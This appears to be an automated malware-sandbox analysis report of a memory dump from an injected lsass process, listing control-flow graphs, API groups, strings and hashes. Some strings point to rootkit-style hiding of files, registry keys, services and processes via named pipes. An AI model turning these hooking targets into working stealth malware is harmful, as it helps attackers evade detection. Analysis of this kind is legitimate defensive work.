261ac901d28 377->386 378->377 384 261ac902ecb-261ac902ed8 378->384 389 261ac902fb5-261ac902fc2 lstrlenW 380->389 390 261ac902faa-261ac902fb3 call 261ac901d28 380->390 381->380 388 261ac902f86-261ac902f93 381->388 391 261ac902e9d-261ac902ea3 383->391 394 261ac902edb-261ac902ee1 384->394 396 261ac902f0a-261ac902f14 385->396 397 261ac902f2b-261ac902f3d call 261ac903930 385->397 386->385 400 261ac902f43-261ac902f48 386->400 398 261ac902f96-261ac902f9c 388->398 392 261ac902fc4-261ac902fce 389->392 393 261ac902fe5-261ac902fef call 261ac903930 389->393 390->389 408 261ac902ffa-261ac903005 390->408 391->400 401 261ac902ea9-261ac902eae 391->401 392->393 402 261ac902fd0-261ac902fe3 call 261ac901554 392->402 403 261ac902ff2-261ac902ff4 393->403 394->400 404 261ac902ee3-261ac902ee8 394->404 396->397 407 261ac902f16-261ac902f29 call 261ac901554 396->407 397->400 397->403 398->408 409 261ac902f9e-261ac902fa3 398->409 400->403 401->376 401->391 402->393 402->408 403->368 403->408 404->377 404->394 407->397 407->400 414 261ac903007-261ac90300b 408->414 415 261ac90307c-261ac903080 408->415 409->380 409->398 419 261ac903013-261ac90302d call 261ac9086a0 414->419 420 261ac90300d-261ac903011 414->420 415->368 422 261ac903030-261ac903033 419->422 420->419 420->422 425 261ac903035-261ac903053 call 261ac9086a0 422->425 426 261ac903056-261ac903059 422->426 425->426 426->415 428 261ac90305b-261ac903079 call 261ac9086a0 426->428 428->415
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001B.00000002.12820179196.00000261AC900000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000261AC900000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_27_2_261ac900000_lsass.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                                                      • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                                      • API String ID: 2119608203-3850299575
                                                                                                      • Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                                                                      • Instruction ID: 7d8ed005e7d37bb82ea3d3b72fb397c75606bc28bfaac9853d2e4a3713813342
                                                                                                      • Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                                                                      • Instruction Fuzzy Hash: 73B1C472212E50C1EB958FA9D6487A973E8FB84BACF5C5016EE0953794DF36EDA0C340
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001B.00000002.12820179196.00000261AC900000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000261AC900000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_27_2_261ac900000_lsass.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 3140674995-0
                                                                                                      • Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                                                                                      • Instruction ID: 82e4e63309bf2bfb59d987c27ecf3fdc2cd5bb3f11aefdcbffc84a1138e0cb86
                                                                                                      • Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                                                                                      • Instruction Fuzzy Hash: 59317072206B80D6EB609FA4E8443ED73B4F784758F48442ADB4E47B98EF39D958C714
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001B.00000002.12820179196.00000261AC900000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000261AC900000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_27_2_261ac900000_lsass.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 1239891234-0
                                                                                                      • Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                                                                                      • Instruction ID: 577cdc5f7814b05eb9a9f5cc1c02ea15c00ea5ce0ceb0bea8c8bd582dae4c8c0
                                                                                                      • Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                                                                                      • Instruction Fuzzy Hash: E231B532205F80C6DB60CF65E94539E73A4F7887A8F580116EB9D43B68DF39C965CB00
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001B.00000002.12820179196.00000261AC900000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000261AC900000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_27_2_261ac900000_lsass.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFileLastWrite$ConsoleOutput
                                                                                                      • String ID:
                                                                                                      • API String ID: 1443284424-0
                                                                                                      • Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                                                                                      • Instruction ID: 291a53735f111b48a05195555e3dd14167aaf9f4af2fa959fb2d0b1aaee81cdb
                                                                                                      • Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                                                                                      • Instruction Fuzzy Hash: 97E11332B05B80CAE740CFA4D2893DD7BB1F38579CF18511ADE4A57B99DA3AD926C700

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001B.00000002.12820179196.00000261AC900000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000261AC900000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_27_2_261ac900000_lsass.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                                      • String ID: d
                                                                                                      • API String ID: 2005889112-2564639436
                                                                                                      • Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                                                                                      • Instruction ID: 9a848add8f4264c8747fb237369bc16771f614e46bc27cf40349c3e578bac85f
                                                                                                      • Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                                                                                      • Instruction Fuzzy Hash: 6251A1B2205B44D3EB50CFA6E64939A77B5F7C8B98F488128DB4907B24DF39D965C700

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001B.00000002.12820179196.00000261AC900000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000261AC900000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_27_2_261ac900000_lsass.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentThread$AddressHandleModuleProc
                                                                                                      • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                                                      • API String ID: 4175298099-1975688563
                                                                                                      • Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                                                                                      • Instruction ID: f769cc3c37b2f718827cf62a100bd4b560becbb62617992d35fd2910eea173b4
                                                                                                      • Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                                                                                      • Instruction Fuzzy Hash: BD319674203E4AE0FB85EFE5EF5E6D43331B78436CF8C54179519121669E3AAEA9C380

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001B.00000002.12820179196.00000261AC900000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000261AC900000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_27_2_261ac900000_lsass.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                                                      • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                                                      • API String ID: 2171963597-1373409510
                                                                                                      • Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                                                                                      • Instruction ID: bbf914e0b0b3795a5f1e94a938dcea64e6e3b9ba28933a567177a69e70b7768f
                                                                                                      • Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                                                                                      • Instruction Fuzzy Hash: A621AC36615B40C3FB50CB65F60935A77B1F388BA8F880219EA5902BA8CF3DD958CB00

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 441 261ac90d2cc-261ac90d322 442 261ac90d483 441->442 443 261ac90d328-261ac90d32b 441->443 444 261ac90d485-261ac90d4a1 442->444 445 261ac90d335-261ac90d338 443->445 446 261ac90d32d-261ac90d330 443->446 447 261ac90d417 445->447 448 261ac90d33e-261ac90d34c 445->448 446->444 449 261ac90d419-261ac90d41c 447->449 450 261ac90d35c-261ac90d37b LoadLibraryExW 448->450 451 261ac90d34e-261ac90d351 448->451 454 261ac90d468-261ac90d47b 449->454 455 261ac90d41e-261ac90d42d GetProcAddress 449->455 452 261ac90d3cc-261ac90d3d6 450->452 453 261ac90d37d-261ac90d386 GetLastError 450->453 456 261ac90d403-261ac90d40a 451->456 457 261ac90d357 451->457 464 261ac90d3e5-261ac90d3f3 452->464 465 261ac90d3d8-261ac90d3e3 452->465 460 261ac90d388-261ac90d39f call 261ac90ad28 453->460 461 261ac90d3ca 453->461 454->442 462 261ac90d461 455->462 463 261ac90d42f-261ac90d456 455->463 456->448 458 261ac90d410 456->458 459 261ac90d3fe-261ac90d401 457->459 458->447 459->456 468 261ac90d458-261ac90d45f 459->468 460->461 470 261ac90d3a1-261ac90d3b5 call 261ac90ad28 460->470 461->452 462->454 463->444 464->459 467 261ac90d3f5-261ac90d3f8 FreeLibrary 464->467 465->456 467->459 468->449 470->461 473 261ac90d3b7-261ac90d3c8 LoadLibraryExW 470->473 473->452
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001B.00000002.12820179196.00000261AC900000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000261AC900000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_27_2_261ac900000_lsass.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc
                                                                                                      • String ID: api-ms-$ext-ms-
                                                                                                      • API String ID: 190572456-537541572
                                                                                                      • Opcode ID: f5082d46cd3e032fbbfcba80e3c796c34016e7f71c0b089d04f54faabee83c69
                                                                                                      • Instruction ID: 2163fba944bd6137ec74327d738e493e4ab06468bce84458ace676e7c080a3b1
                                                                                                      • Opcode Fuzzy Hash: f5082d46cd3e032fbbfcba80e3c796c34016e7f71c0b089d04f54faabee83c69
                                                                                                      • Instruction Fuzzy Hash: 9341A173313A40C5FA65CF969A0C7A96295B744BE8F0C55299D1E8F7D4DE3AEC25C300

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001B.00000002.12820179196.00000261AC900000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000261AC900000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_27_2_261ac900000_lsass.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                                      • String ID: d
                                                                                                      • API String ID: 3743429067-2564639436
                                                                                                      • Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                                                                                      • Instruction ID: dd091479e8f29d3b9dd80fb33157ba638634700dd1179569e4295042f79b9ea3
                                                                                                      • Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                                                                                      • Instruction Fuzzy Hash: 0641A373215B80D7E7A4CF95E54839AB7B1F389B98F048129DB8907B54DF39E564CB00
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001B.00000002.12820179196.00000261AC900000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000261AC900000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_27_2_261ac900000_lsass.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                      • String ID: api-ms-
                                                                                                      • API String ID: 2559590344-2084034818
                                                                                                      • Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                                                                                      • Instruction ID: 54c97a112f7ac961a1d855ead0f2abc894183abf3ecedc89bbc889489f707419
                                                                                                      • Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                                                                                      • Instruction Fuzzy Hash: 4331A231313B50D5EE55DB86AA0879963A4BB4CBB8F1E4529ED2D4B390DF39EC65C300
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001B.00000002.12820179196.00000261AC900000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000261AC900000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_27_2_261ac900000_lsass.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                      • String ID: CONOUT$
                                                                                                      • API String ID: 3230265001-3130406586
                                                                                                      • Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                                                                                      • Instruction ID: 2d9cf5fd97bd50f63925a2a8b236dae44888205c90dea29a88fb9f526cf10471
                                                                                                      • Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                                                                                      • Instruction Fuzzy Hash: 82119032316F50C6E7918B86E94A31962B4F3C8FE8F084228EA5D87794CF3ADD24C740
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001B.00000002.12820179196.00000261AC900000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000261AC900000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_27_2_261ac900000_lsass.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Thread$Current$Context
                                                                                                      • String ID:
                                                                                                      • API String ID: 1666949209-0
                                                                                                      • Opcode ID: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
                                                                                                      • Instruction ID: b8d73a251533bf7d5705ae63d7ed7ee47eeb2b56d79fbd5c3ae4a23db443b3fb
                                                                                                      • Opcode Fuzzy Hash: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
                                                                                                      • Instruction Fuzzy Hash: D5D1EE76209B88C1EA70DB4AE59835A77B0F3C8B98F140116EACD47BA5DF3DD961CB04
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001B.00000002.12820179196.00000261AC900000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000261AC900000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_27_2_261ac900000_lsass.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Heap$Process$AllocFree
                                                                                                      • String ID: dialer
                                                                                                      • API String ID: 756756679-3528709123
                                                                                                      • Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                                                                                      • Instruction ID: 60cefdf3c800dba43227cc81b2c391a2d253679cfcbb88171eb21ae8216cbf90
                                                                                                      • Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                                                                                      • Instruction Fuzzy Hash: A031DB71302B51D2EB91DF9AAA4836567A5FB487A8F0C40249F4807755EF39EFB1C700
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001B.00000002.12820179196.00000261AC900000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000261AC900000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_27_2_261ac900000_lsass.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                                                      • String ID:
                                                                                                      • API String ID: 517849248-0
                                                                                                      • Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                                                                                      • Instruction ID: 0200840e0fe56ffd4af8af3ee40f89a2f6a68e51358db5a200dc8555406b84a3
                                                                                                      • Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                                                                                      • Instruction Fuzzy Hash: EF018B31301B81D6EA50DB96A55935967A4F788FD8F484038CE8943B54CF3AD995C300
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001B.00000002.12820179196.00000261AC900000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000261AC900000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_27_2_261ac900000_lsass.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                                                      • String ID:
                                                                                                      • API String ID: 449555515-0
                                                                                                      • Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                                                                                      • Instruction ID: c91eb7ea61f917b23f196bef12f2980d43e42ac997de2eab4c4d04c1821f5cbe
                                                                                                      • Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                                                                                      • Instruction Fuzzy Hash: 12118074313B40C6FB609BA5E90E71677B4BB88B99F080428CE5907754EF3ED928C700
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001B.00000002.12820179196.00000261AC900000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000261AC900000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_27_2_261ac900000_lsass.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CombinePath
                                                                                                      • String ID: \\.\pipe\
                                                                                                      • API String ID: 3422762182-91387939
                                                                                                      • Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                                                                                      • Instruction ID: 6b7c93c663e96aca6081cbbc4f6539ba795be908b2b5302ad8724592aa496600
                                                                                                      • Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                                                                                      • Instruction Fuzzy Hash: 9BF08230305BC0D1EA409B9BBB0A1196669BB88FD8F0C8535DE5A47B28CE2DD9A1C300
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001B.00000002.12820179196.00000261AC900000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000261AC900000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_27_2_261ac900000_lsass.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                      • Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                                                                                      • Instruction ID: 23f29a0e5de5f0719f90700654cd2b6b00c9e894801dbb97afcbaf02d7baa7f7
                                                                                                      • Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                                                                                      • Instruction Fuzzy Hash: 8FF05E71322B40D1EFC48FA4F98936827B4AB88B98F4C201D950B45561CE39DDA8C700
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001B.00000002.12820179196.00000261AC900000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000261AC900000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_27_2_261ac900000_lsass.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                                                      • String ID:
                                                                                                      • API String ID: 1092925422-0
                                                                                                      • Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                                                                                      • Instruction ID: cbc89a7227a1b971b39513e3f5e984148f7588812dcd76ca77fc41db57e81c51
                                                                                                      • Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                                                                                      • Instruction Fuzzy Hash: B6115E3A706B40C6EB549B9AF50936976B8F788B98F080029DE9907794EF3EDA14C700
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001B.00000002.12820179196.00000261AC900000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000261AC900000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_27_2_261ac900000_lsass.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CaptureContextEntryFunctionLookupUnwindVirtual
                                                                                                      • String ID: NtQuerySystemInformation
                                                                                                      • API String ID: 2154932578-2549949336
                                                                                                      • Opcode ID: 74219aee19f4c8fff33bb8f441b5a8c4dce270eb6b270de61d52c61c6ba0a4a7
                                                                                                      • Instruction ID: d62cc019df18ec8baf77d74c90a52356c93a1136b082d76ae4af6343e8fac9a5
                                                                                                      • Opcode Fuzzy Hash: 74219aee19f4c8fff33bb8f441b5a8c4dce270eb6b270de61d52c61c6ba0a4a7
                                                                                                      • Instruction Fuzzy Hash: 96F0A473215780C2EB508B56F44436A6765F7C9BD4F480124EE4E46B44DF38D996CB04
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001B.00000002.12820179196.00000261AC900000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000261AC900000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_27_2_261ac900000_lsass.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Heap$Process$Free
                                                                                                      • String ID:
                                                                                                      • API String ID: 3168794593-0
                                                                                                      • Opcode ID: f1983aadbafb302923b8fe7f482f9c632134a4f8d61b19ff0aa35b357364af3e
                                                                                                      • Instruction ID: 440408a771c14eb1e1f195ef39f648939980ccaffd0beb8cf3d0145e8e806e17
                                                                                                      • Opcode Fuzzy Hash: f1983aadbafb302923b8fe7f482f9c632134a4f8d61b19ff0aa35b357364af3e
                                                                                                      • Instruction Fuzzy Hash: D8115E71515B88D2E7549FAAA94821A7774F389B98F084129EB8A03724DF39D961C700
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001B.00000002.12820179196.00000261AC900000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000261AC900000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_27_2_261ac900000_lsass.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ConsoleErrorLastMode
                                                                                                      • String ID:
                                                                                                      • API String ID: 953036326-0
                                                                                                      • Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                                                                                      • Instruction ID: 2266a0273fe63437f9284d290f6990fba57a1e5969df2e9394dfeda2aff10efc
                                                                                                      • Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                                                                                      • Instruction Fuzzy Hash: 4481F332652740C9FB90ABE59A5E3AD27A0F7C4B9CF4C111ADE0A53795DB37AC62C310
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001B.00000002.12820179196.00000261AC900000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000261AC900000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_27_2_261ac900000_lsass.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                      • String ID:
                                                                                                      • API String ID: 2933794660-0
                                                                                                      • Opcode ID: ac8b8696854b531a2c36d8a3483ee891c5ec117b5ea5b6300ddbe8ada65bf13e
                                                                                                      • Instruction ID: 94ff431c7b926628b80feab7ebd132d972870395475862792deb17a3a9e63793
                                                                                                      • Opcode Fuzzy Hash: ac8b8696854b531a2c36d8a3483ee891c5ec117b5ea5b6300ddbe8ada65bf13e
                                                                                                      • Instruction Fuzzy Hash: B9113032301F41CAEB50CFA4E95A39433A4F75D76CF081A25EA6D46794DF39D6A5C340
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001B.00000002.12820179196.00000261AC900000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000261AC900000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_27_2_261ac900000_lsass.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Unwind
                                                                                                      • String ID: csm$f
                                                                                                      • API String ID: 3419175465-629598281
                                                                                                      • Opcode ID: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
                                                                                                      • Instruction ID: 5a1ffb07863914cc3b45ee6b1d074dd3c0e9a35d77ca37f445d72484a081e205
                                                                                                      • Opcode Fuzzy Hash: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
                                                                                                      • Instruction Fuzzy Hash: AE51BE32312640CAEB54CF99E64CB1937A5F388BBCF5A8124EE5647789DB36ED61C700
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001B.00000002.12820179196.00000261AC900000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000261AC900000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_27_2_261ac900000_lsass.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileType
                                                                                                      • String ID: \\.\pipe\
                                                                                                      • API String ID: 3081899298-91387939
                                                                                                      • Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                                                                      • Instruction ID: bc0bbcd928978f354d62f8b08008e5709131040d208fe549614c983724066030
                                                                                                      • Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                                                                      • Instruction Fuzzy Hash: 9E510E32206B81C1E6749EA9975C37E6795F3857A8F5D4026CD4903F9ACE37ED21CB40
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001B.00000002.12820179196.00000261AC900000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000261AC900000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_27_2_261ac900000_lsass.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFileLastWrite
                                                                                                      • String ID: U
                                                                                                      • API String ID: 442123175-4171548499
                                                                                                      • Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                                                                                      • Instruction ID: 7683cc5ed04c8e35fd09b651937c666d3b3d2794972103e17cb144a6e1373940
                                                                                                      • Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                                                                                      • Instruction Fuzzy Hash: 0741B232316B40C5EB60DF65E9493AA77A0F3C8BD8F484129EE4D87788DB3AD911CB40
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001B.00000002.12820179196.00000261AC900000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000261AC900000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_27_2_261ac900000_lsass.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionFileHeaderRaise
                                                                                                      • String ID: csm
                                                                                                      • API String ID: 2573137834-1018135373
                                                                                                      • Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                                                                                      • Instruction ID: a5c75ae3dd82ba6c4337143e328fc8557f43a0959b80902c9fd2485e7acef711
                                                                                                      • Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                                                                                      • Instruction Fuzzy Hash: 8C114C32209B80C2EB608F15E5442597BA4F788BA8F5D4224DF8D07B68DF39DD61CB00
